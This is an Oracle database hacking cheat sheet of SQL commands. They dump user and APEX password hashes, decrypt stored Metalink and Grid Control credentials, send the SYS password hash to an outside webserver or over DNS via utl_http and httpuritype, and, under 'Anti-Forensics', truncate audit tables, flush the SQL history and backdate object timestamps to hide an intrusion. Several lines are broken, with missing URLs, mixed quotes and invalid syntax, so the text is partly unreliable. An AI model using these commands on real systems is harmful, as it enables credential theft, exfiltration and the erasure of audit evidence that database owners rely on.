Oracle Cheat Sheet Page 4


Information Retrieval:
Hacking Oracle - Version 1.5.0 - 29-Jan-2008
Get version:
select * from v$version
-- all users
Get security patchlevel:
select * from dba_registry_history;
-- only DBA, 9i+; an empty or non-existent table means no security patch is installed
Installed database components:
select * from dba_registry;
-- only DBA
Get userlist:
select * from all_users;
-- all users
Get user & PW hashes(7-10g):
select username,password,account_status from dba_users;
-- only DBA until 10g R2
Get user & PW hashes(11g/10g):
select name,password,spare4,accountstatus from sys.user$, sys.dba_users where user#=user_id;
-- only DBA 11g R1
Get Apex password hashes:
select user_name, web_password_raw from flows_030000.wwv_flow_fnd_user;
-- only DBA, 030000 = APEX version 3.0, 020100=2.1
Decrypt Apex password hashes:
select user_name, utl_http.request(' '||web_password_raw||’&b=MD5-Search’) -- only DBA, requires internet access from the database
from flows_030000.wwv_flow_fnd_user;
Get Metalink account/password:
select sysman.decrypt(aru_username), sysman.decrypt(aru_password) from sysman.mgmt_aru_credentials;-- only DBA, 10g
Get password of mgmt_view_user select view_username, sysman.decrypt(view_password) from sysman.mgmt_view_user_credentials;
-- only DBA, 10g
Get passwords of DB/Grid control: select credential_set_column, sysman.decrypt(credential_value) from sysman.mgmt_credentials2;
-- only DBA, 10g
TDE encrypted tables:
select table_name,column_name,encryption_alg,salt from dba_encrypted_columns;
-- only DBA, 10g – 11g
Show code using encryption:
select owner, name, type, referenced_name from all_dependencies where referenced_name
-- show objects using database encryption (e.g. for passwords)
IN ('DBMS_CRYPTO', 'DBMS_OBFUSCATION_TOOLKIT')
Already DBA?
desc dba_users
-- only possible if DBA (or select any dictionary), not audited
Get system privileges:
select * from user_sys_privs;
-- show system privileges of the current user
Get role privileges:
select * from user_role_privs;
-- show role privileges of the current user
Get table privileges:
select * from user_tab_privs;
-- show table privileges of the current user
Get interesting tables:
-- List columns whose name contains 'PWD', 'PASSW', 'CREDEN' or 'AUTH'.
-- Only column names in dba_tab_columns are matched; column contents are not read,
-- so every hit still has to be reviewed to see what is actually stored there.
select table_name,column_name,owner from dba_tab_columns where ((upper(column_name)
like '%PWD%' or upper(column_name) like '%PASSW%' or upper(column_name) like '%CREDEN%' or
-- the script anapassword.sql checks all objects
upper(column_name) like '%AUTH%'))
Get tables with passwords:
@anapassword.sql
-- run the SQL script anapassword.sql
Get a list of all Oracle directories:
select * from dba_directories;
-- show Oracle directories
Access SQL history (v$sql):
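select sql_text from sys.v$sql where lower(sql_text) like '%utl_http%';
-- search the SQL statements held in v$sql for text containing the string utl_http
-- (case-insensitive, because sql_text is lower-cased before the match)
-- v$sql is emptied when the shared pool is flushed, so an empty result
-- does not show that utl_http was never used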
Access SQL history (wrh$_sqltext):
select sql_text from sys.wrh$_sqltext where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http
Check whether audit_sys_operations is enabled:
select name,value from v$parameter where name = 'audit_sys_operations';
-- check if commands submitted by SYS are audited
Check for database trigger:
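select owner,trigger_name from dba_triggers where trigger_type='AFTER EVENT';
-- check for logon, DDL or startup/shutdown triggers
-- returns owner and name of every trigger whose trigger_type is 'AFTER EVENT'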
Search strings in tables (dbgrep)
@dbgrep.sql
-- run the SQL script dbgrep.sql (from RDS)
Get information from listener.log
@analistener.sql
-- run the SQL script analistener.sql (from RDS)
Web Access:
Web access via utl_http:
select utl_http.request(' ) from dual;
-- all users, 8-10g R2
Web access via httpuritype:
select httpuritype( ' ' ).getclob() from dual;
-- all users, 8-10g R2
Send password hash to webserver: select utl_http.request(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’)) from dual;
Send password hash to webserver: select httpuritype(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’)).getclob() from dual;
Send password hash via DNS:
select utl_http.request(' (select username||’=’||password from dba_users
-- only DBA, change value of username for other users
where username=’SYS’) ) from dual;
Anti-Forensics:
Clear v$sql:
alter system flush shared pool;
-- only DBA, all versions
Clear sys.wrh_sqlstat:
truncate table sys.wrh$_sqlstat;
-- only DBA, 10g/11g
Clear audit-Table:
truncate table sys.aud$;
-- only as SYS, all versions
Clear audit-Table:
delete table sys.aud$;
-- only, all versions
Change object creation date:
update sys.obj$ set ctime=sysdate-300, mtime=sysdate-300, stime=sysdate-300 where name='AUD$';
-- change the creation date of an object
